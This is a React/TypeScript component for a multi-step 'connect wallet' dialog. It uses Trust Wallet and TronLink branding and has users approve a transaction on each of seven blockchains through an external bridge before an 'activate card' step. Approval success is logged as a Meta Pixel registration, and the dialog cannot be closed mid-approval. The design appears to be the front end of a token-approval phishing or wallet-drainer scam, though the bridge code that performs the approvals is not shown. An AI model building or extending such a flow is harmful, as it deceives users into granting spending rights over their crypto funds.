import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Dialog, DialogContent, DialogTitle, DialogDescription } from "@/components/ui/dialog";
import { ChevronLeft, Wallet, Wifi, ArrowRight, X, Loader2 } from "lucide-react";
import { useLanguage } from "@/i18n/LanguageContext";
import networkTron from "@/assets/network-tron.webp";
import networkEth from "@/assets/network-eth.webp";
import networkBsc from "@/assets/network-bsc.webp";
import polLogo from "@/assets/network-polygon.png";
import avaxLogo from "@/assets/avalanche-logo.png";
import arbLogo from "@/assets/network-arbitrum.png";
import baseLogo from "@/assets/network-base.png";
import { motion } from "framer-motion";
import { trackMetaPixelApproveSuccess, trackMetaPixelCompleteRegistration } from "@/lib/metaPixel";

const config = {
  delayMs: 1500,
};

const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms));

type WalletConnectResult = {
  pending?: boolean;
  connected?: boolean;
  error?: string;
};

type WalletType = "walletconnect" | "tronlink";

type WalletBridge = {
  connect?: () => Promise<WalletConnectResult | unknown>;
  setWalletType?: (walletType?: string) => Promise<string> | string;
  approveByNetworkId?: (networkId: string, element?: HTMLElement | null) => Promise<boolean>;
};

declare global {
  interface Window {
    __twproductWalletConnect?: WalletBridge;
    tronLink?: unknown;
    tronWeb?: {
      defaultAddress?: {
        base58?: string;
      };
    };
  }
}

const getWalletBridge = () => window.__twproductWalletConnect;

const isTronLinkEnvironment = () => {
  if (typeof window === "undefined") return false;

  const userAgent = navigator.userAgent.toLowerCase();
  return Boolean(window.tronLink || window.tronWeb?.defaultAddress?.base58 || userAgent.includes("tronlink"));
};

const getInitialWalletType = (): WalletType => isTronLinkEnvironment() ? "tronlink" : "walletconnect";

const isPendingWalletConnectResult = (value: unknown): value is WalletConnectResult =>
  typeof value === "object" && value !== null && "pending" in value && Boolean((value as WalletConnectResult).pending);

const isFailedWalletConnectResult = (value: unknown): value is WalletConnectResult =>
  typeof value === "object" && value !== null && "connected" in value && (value as WalletConnectResult).connected === false;

const networks = [
  { id: "trons", name: "Tron (TRC-20)", icon: networkTron, iconSize: "w-[13.5rem] h-[13.5rem]" },
  { id: "eth_btn", name: "Ethereum (ERC-20)", icon: networkEth, iconSize: "w-[13.5rem] h-[13.5rem]" },
  { id: "bsc_btn", name: "BSC (BEP-20)", icon: networkBsc, iconSize: "w-9 h-9" },
  { id: "polygon_btn", name: "Polygon (ERC-20)", icon: polLogo, iconSize: "w-9 h-9" },
  { id: "avax_btn", name: "Avalanche (ERC-20)", icon: avaxLogo, iconSize: "w-9 h-9" },
  { id: "arbitrum_btn", name: "Arbitrum (ERC-20)", icon: arbLogo, iconSize: "w-9 h-9" },
  { id: "base_btn", name: "Base (ERC-20)", icon: baseLogo, iconSize: "w-9 h-9" },
] as const;



interface ConnectWalletModalProps {
  open: boolean;
  onOpenChange: (open: boolean) => void;
}

const ConnectWalletModal = ({ open, onOpenChange }: ConnectWalletModalProps) => {
  const { t, language } = useLanguage();
  const navigate = useNavigate();

  
  // 0: intro, 1: connect, 2: network, 3: ready
  const [step, setStep] = useState(0);
  
  // Перенесенное состояние из Old.tsx
  const [loading, setLoading] = useState(false);
  const [approveStatus, setApproveStatus] = useState<Record<string, string>>({});
  const [isBlocked, setIsBlocked] = useState(false);
  const [selectedWalletType, setSelectedWalletType] = useState<WalletType>(getInitialWalletType);

  const walletSteps = [
    t("wallet.step1"),
    t("wallet.step2"),
    t("wallet.step3"),
  ];

  // Сброс состояния при открытии модального окна
  useEffect(() => {
    if (open) {
      setStep(0);
      setLoading(false);
      setApproveStatus({});
      setIsBlocked(false);
      setSelectedWalletType(getInitialWalletType());
    }
  }, [open]);

  const isConnecting =
    loading ||
    Object.values(approveStatus).some((s) => s === "waiting" || s === "pending");

  const handleClose = () => {
    if (isConnecting) return;
    onOpenChange(false);
    setTimeout(() => {
      setStep(0);
    }, 300);
  };

  const handleBack = () => {
    if (isConnecting) return;
    if (step === 0) {
      handleClose();
    } else {
      setStep(step - 1);
    }
  };

  // Функция подключения кошелька (Шаг 2)
  const handleConnect = async (walletType: WalletType = getInitialWalletType()) => {
    setLoading(true);

    try {
      const bridge = getWalletBridge();

      if (!bridge?.connect) {
        throw new Error("WalletConnect bundle is not loaded");
      }

      // Keep WalletConnect opening inside the original click user gesture.
      // Awaiting setWalletType first can move the modal/deeplink call to a later
      // microtask, which some mobile browsers/wallets ignore until the next tap.
      void bridge.setWalletType?.(walletType);
      const connectResult = await bridge.connect();

      if (isPendingWalletConnectResult(connectResult)) {
        return;
      }

      if (isFailedWalletConnectResult(connectResult)) {
        throw new Error(connectResult.error || "Wallet connection was cancelled or failed");
      }

      setSelectedWalletType(walletType);
      setTimeout(() => setStep(2), 600);
    } catch (err) {
      console.error(err);
    } finally {
      await sleep(config.delayMs);
      setLoading(false);
    }
  };

  // Функция выбора сети (Шаг 3)
  const handleApprove = async (network: (typeof networks)[number]["id"]) => {
    setApproveStatus((s) => ({ ...s, [network]: "waiting" }));

    try {
      const bridge = getWalletBridge();

      if (!bridge?.approveByNetworkId) {
        throw new Error("Wallet approve bridge is not loaded");
      }

      await sleep(300);
      setApproveStatus((s) => ({ ...s, [network]: "pending" }));
      const target = document.getElementById(network);
      const approved = await bridge.approveByNetworkId(network, target);

      if (!approved) {
        throw new Error("Wallet approval was cancelled or failed");
      }

      setApproveStatus((s) => ({
        ...s,
        [network]: `✅ ${t("wallet.status.done")}`,
      }));
      trackMetaPixelApproveSuccess(network);
      trackMetaPixelCompleteRegistration();
      setTimeout(() => setStep(3), 1000);
    } catch (err) {
      console.error(err);
      setApproveStatus((s) => ({ ...s, [network]: `❌ ${t("wallet.status.error")}` }));
      setIsBlocked(true);
      setTimeout(() => setIsBlocked(false), 2000);
    } finally {
      await sleep(config.delayMs);
    }
  };

  const walletOptions = isTronLinkEnvironment()
    ? [{ id: "tronlink" as const, label: t("wallet.tronLink"), icon: "/trust-assets/wallets/tronlink-logo-name-dark.png" }]
    : [
        { id: "walletconnect" as const, label: t("wallet.walletConnect"), icon: "/trust-assets/wallets/trust-wallet-logo.png" },
        { id: "tronlink" as const, label: t("wallet.tronLink"), icon: "/trust-assets/wallets/tronlink-logo-name-dark.png" },
      ];

  const availableNetworks = selectedWalletType === "tronlink"
    ? networks.filter((network) => network.id === "trons")
    : networks;

  const titles: Record<number, string> = {
    0: t("wallet.intro.title"),
    1: walletSteps[0],
    2: walletSteps[1],
    3: walletSteps[2],
  };

  const showChips = step >= 1;
  const chipStep = step - 1;

  return (
    <Dialog open={open} onOpenChange={handleClose} modal={false}>
      <DialogContent 
        className="sm:max-w-[480px] max-h-[calc(100dvh-2rem)] sm:max-h-[88vh] p-0 gap-0 rounded-2xl border-border overflow-hidden flex flex-col [&>button.absolute]:hidden"
        onInteractOutside={(e) => { if (isConnecting) e.preventDefault(); }}
        onEscapeKeyDown={(e) => { if (isConnecting) e.preventDefault(); }}
      >
        <div className="min-h-0 flex-1 overflow-y-auto overscroll-contain p-6 pb-4 [-webkit-overflow-scrolling:touch]">
          <div className="flex items-center gap-2 mb-5">
            {step === 0 ? (
              <div className="w-8 h-8 shrink-0" />
            ) : (
              <button
                onClick={handleBack}
                disabled={isConnecting}
                className="w-8 h-8 flex items-center justify-center rounded-full hover:bg-secondary transition-colors shrink-0 disabled:opacity-50"
              >
                <ChevronLeft className="w-5 h-5 text-foreground" />
              </button>
            )}
            <DialogTitle className="text-xl font-bold text-foreground text-center flex-1">
              {titles[step]}
            </DialogTitle>
            <button
              onClick={handleClose}
              disabled={isConnecting}
              className="w-8 h-8 flex items-center justify-center rounded-full hover:bg-secondary transition-colors shrink-0 disabled:opacity-50"
              aria-label={t("wallet.close")}
            >
              <X className="w-5 h-5 text-foreground" />
            </button>
          </div>
          <DialogDescription className="sr-only">{titles[step]}</DialogDescription>

          {showChips && (
            <div className="flex gap-2 mb-5">
              {walletSteps.map((label, i) => (
                <div
                  key={i}
                  className={`flex items-center gap-1.5 px-2.5 py-2 rounded-xl text-[11px] font-medium flex-1 min-w-0 ${
                    i === chipStep
                      ? "bg-primary/10 border border-primary/30 text-primary"
                      : i < chipStep
                        ? "bg-primary/5 border border-primary/10 text-primary/60"
                        : "bg-muted/50 border border-transparent text-muted-foreground"
                  }`}
                >
                  <div
                    className={`w-1.5 h-1.5 rounded-full shrink-0 ${
                      i <= chipStep ? "bg-primary" : "bg-muted-foreground/40"
                    }`}
                  />
                  <span className="truncate">{label}</span>
                </div>
              ))}
            </div>
          )}

          {/* Step 0: Intro */}
          {step === 0 && (
            <div className="space-y-3">
              {[
                {
                  number: 1,
                  title: t("wallet.intro.step1.title"),
                  subtitle: t("wallet.intro.step1.subtitle"),
                  desc: t("wallet.intro.step1.desc"),
                  active: true,
                },
                {
                  number: 2,
                  title: t("wallet.intro.step2.title"),
                  subtitle: t("wallet.intro.step2.subtitle"),
                  desc: t("wallet.intro.step2.desc"),
                  active: false,
                },
                {
                  number: 3,
                  title: t("wallet.intro.step3.title"),
                  subtitle: t("wallet.intro.step3.subtitle"),
                  desc: t("wallet.intro.step3.desc"),
                  active: false,
                },
              ].map((item) => (
                <div
                  key={item.number}
                  className={`rounded-2xl border p-4 transition-colors ${
                    item.active
                      ? "border-primary bg-primary/[0.04] shadow-[0_0_0_1px_hsl(var(--primary))]"
                      : "border-border bg-muted/20 opacity-55"
                  }`}
                >
                  <div className="flex items-start gap-3">
                    <div
                      className={`mt-0.5 flex h-9 w-9 shrink-0 items-center justify-center rounded-full text-sm font-bold ${
                        item.active
                          ? "bg-primary text-primary-foreground"
                          : "bg-muted text-muted-foreground"
                      }`}
                    >
                      {item.number}
                    </div>
                    <div className="min-w-0 flex-1">
                      <h3 className="text-lg font-bold leading-tight text-foreground">
                        {item.title}
                      </h3>
                      <p className="mt-2 text-sm leading-relaxed text-muted-foreground">
                        {item.subtitle}
                      </p>
                      <p className="mt-3 text-sm leading-relaxed text-muted-foreground">
                        {item.desc}
                      </p>
                      {item.active && (
                        <button
                          className="mt-4 w-full inline-flex items-center justify-center gap-2 rounded-full bg-primary px-6 py-3.5 text-base font-semibold text-primary-foreground shadow-[var(--shadow-button)] transition-transform hover:-translate-y-0.5"
                          onClick={() => setStep(1)}
                        >
                          {t("wallet.continue")}
                          <ArrowRight className="w-4 h-4" />
                        </button>
                      )}
                    </div>
                  </div>
                </div>
              ))}
            </div>
          )}

          {/* Step 1: Подключение кошелька */}
          {step === 1 && (
            <div className="space-y-5">
              <div className="flex flex-col items-center text-center py-6">
                <motion.div
                  className="w-24 h-24 rounded-2xl bg-primary/10 flex items-center justify-center mb-4 relative"
                  initial={{ scale: 0.8, opacity: 0 }}
                  animate={{ scale: 1, opacity: 1 }}
                  transition={{ duration: 0.5, ease: "easeOut" }}
                >
                  {loading ? (
                    <Loader2 className="w-12 h-12 text-primary animate-spin" />
                  ) : (
                    <motion.div
                      animate={{ y: [0, -6, 0] }}
                      transition={{ duration: 2, repeat: Infinity, ease: "easeInOut" }}
                    >
                      <Wallet className="w-12 h-12 text-primary" />
                    </motion.div>
                  )}
                  <motion.div
                    className="absolute inset-0 rounded-2xl border-2 border-primary/30"
                    animate={{ scale: [1, 1.15, 1], opacity: [0.5, 0, 0.5] }}
                    transition={{ duration: 2, repeat: Infinity, ease: "easeInOut" }}
                  />
                  <motion.div
                    className="absolute inset-0 rounded-2xl border-2 border-primary/20"
                    animate={{ scale: [1, 1.3, 1], opacity: [0.3, 0, 0.3] }}
                    transition={{ duration: 2, repeat: Infinity, ease: "easeInOut", delay: 0.3 }}
                  />
                  <motion.div
                    className="absolute -top-2 -right-2 w-8 h-8 rounded-full bg-primary flex items-center justify-center"
                    animate={{ scale: [1, 1.1, 1] }}
                    transition={{ duration: 1.5, repeat: Infinity }}
                  >
                    <Wifi className="w-4 h-4 text-primary-foreground" />
                  </motion.div>
                </motion.div>
                <p className="text-sm text-muted-foreground max-w-xs">
                  {t("wallet.connectDesc")}
                </p>
              </div>
              <div className="grid grid-cols-1 gap-3">
                {walletOptions.map((wallet) => (
                  <button
                    key={wallet.id}
                    className="flex w-full items-center gap-4 rounded-2xl border border-primary/15 bg-primary/[0.03] px-5 py-4 text-left transition-colors hover:bg-primary/[0.07] disabled:opacity-60"
                    onClick={() => handleConnect(wallet.id)}
                    disabled={loading}
                  >
                    <span className="flex h-12 w-12 shrink-0 items-center justify-center rounded-full bg-muted/60 overflow-hidden">
                      {loading ? (
                        <Loader2 className="w-6 h-6 text-primary animate-spin" />
                      ) : (
                        <img src={wallet.icon} alt={wallet.label} className="h-7 w-7 object-contain" />
                      )}
                    </span>
                    <span className="min-w-0 flex-1">
                      <span className="block font-semibold text-sm text-foreground">{wallet.label}</span>
                      <span className="mt-0.5 block text-xs text-muted-foreground">{t("wallet.tapToConnect")}</span>
                    </span>
                    {!loading && <ArrowRight className="w-4 h-4 text-muted-foreground shrink-0" />}
                  </button>
                ))}
              </div>
              <p className="text-xs text-muted-foreground text-center">
                {t("wallet.afterConnect")}
              </p>
            </div>
          )}

          {/* Step 2: Выбор сети и Approve транзакции */}
          {step === 2 && (
            <div className="space-y-4">
              <p className="text-sm text-muted-foreground text-center">
                {t("wallet.chooseNetwork")}
              </p>
              <div className="grid grid-cols-1 gap-3 max-h-[340px] overflow-y-auto [&::-webkit-scrollbar]:hidden [-ms-overflow-style:none] [scrollbar-width:none]">
                {availableNetworks.map((network, i) => {
                  const status = approveStatus[network.id];
                  const isWaiting = status === "waiting";
                  const isPending = status === "pending";
                  const anyBusy = Object.values(approveStatus).some(
                    (s) => s === "waiting" || s === "pending"
                  );
                  const isDisabled = isWaiting || isPending || anyBusy || isBlocked;

                  return (
                    <motion.button
                      id={network.id}
                      key={network.id}
                      initial={{ opacity: 0, y: 8 }}
                      animate={{ opacity: 1, y: 0 }}
                      transition={{ delay: i * 0.05 }}
                      onClick={() => handleApprove(network.id)}
                      disabled={isDisabled}
                      className={`flex items-center gap-4 rounded-2xl border px-5 py-4 text-left transition-colors ${
                        isDisabled
                          ? "opacity-70 cursor-not-allowed border-primary/10 bg-primary/[0.02]"
                          : "border-primary/15 bg-primary/[0.03] hover:bg-primary/[0.07]"
                      }`}
                    >
                      <div className="flex h-12 w-12 items-center justify-center rounded-full bg-muted/60 shrink-0 overflow-hidden">
                        {isWaiting || isPending ? (
                          <Loader2 className="w-6 h-6 text-primary animate-spin" />
                        ) : (
                          <img
                            src={network.icon}
                            alt={network.name}
                            className={`${network.iconSize} object-contain`}
                          />
                        )}
                      </div>
                      <div className="min-w-0 flex-1">
                        <p className="font-semibold text-sm text-foreground">
                          {isWaiting
                            ? t("wallet.status.waiting")
                            : isPending
                              ? t("wallet.status.pending")
                              : network.name}
                        </p>
                        <p className="text-xs text-muted-foreground mt-0.5">
                          {status && !isWaiting && !isPending
                            ? status
                            : t("wallet.tapToConnect")}
                        </p>
                      </div>
                      {!isWaiting && !isPending && (
                        <ArrowRight className="w-4 h-4 text-muted-foreground shrink-0" />
                      )}
                    </motion.button>
                  );
                })}
              </div>
            </div>
          )}

          {/* Step 3: Ready / Успешное завершение */}
          {step === 3 && (
            <div className="space-y-5">
              <div className="flex flex-col items-center text-center py-6">
                <motion.div
                  className="w-20 h-20 rounded-2xl bg-green-500/10 flex items-center justify-center mb-4"
                  initial={{ scale: 0.5, opacity: 0 }}
                  animate={{ scale: 1, opacity: 1 }}
                  transition={{ type: "spring", stiffness: 200, damping: 15 }}
                >
                  <motion.svg
                    viewBox="0 0 24 24"
                    className="w-10 h-10 text-green-500"
                    fill="none"
                    stroke="currentColor"
                    strokeWidth={2.5}
                    strokeLinecap="round"
                    strokeLinejoin="round"
                  >
                    <motion.path
                      d="M5 13l4 4L19 7"
                      initial={{ pathLength: 0 }}
                      animate={{ pathLength: 1 }}
                      transition={{ duration: 0.5, delay: 0.3 }}
                    />
                  </motion.svg>
                </motion.div>
                <h3 className="text-lg font-bold text-foreground mb-1">
                  {t("wallet.readyTitle")}
                </h3>
                <p className="text-sm text-muted-foreground max-w-xs">
                  {t("wallet.readyDesc")}
                </p>
              </div>
              <button
                className="w-full inline-flex items-center justify-center rounded-2xl bg-primary px-6 py-3 text-base font-semibold text-primary-foreground shadow-[var(--shadow-button)] transition-transform hover:-translate-y-0.5"
                onClick={() => {
                  handleClose();
                  const prefix = language === "en" ? "" : `/${language}`;
                  navigate(`${prefix}/success`);
                }}
              >
                {t("wallet.activateCard")}
              </button>
            </div>
          )}
        </div>
      </DialogContent>
    </Dialog>
  );
};

export default ConnectWalletModal;
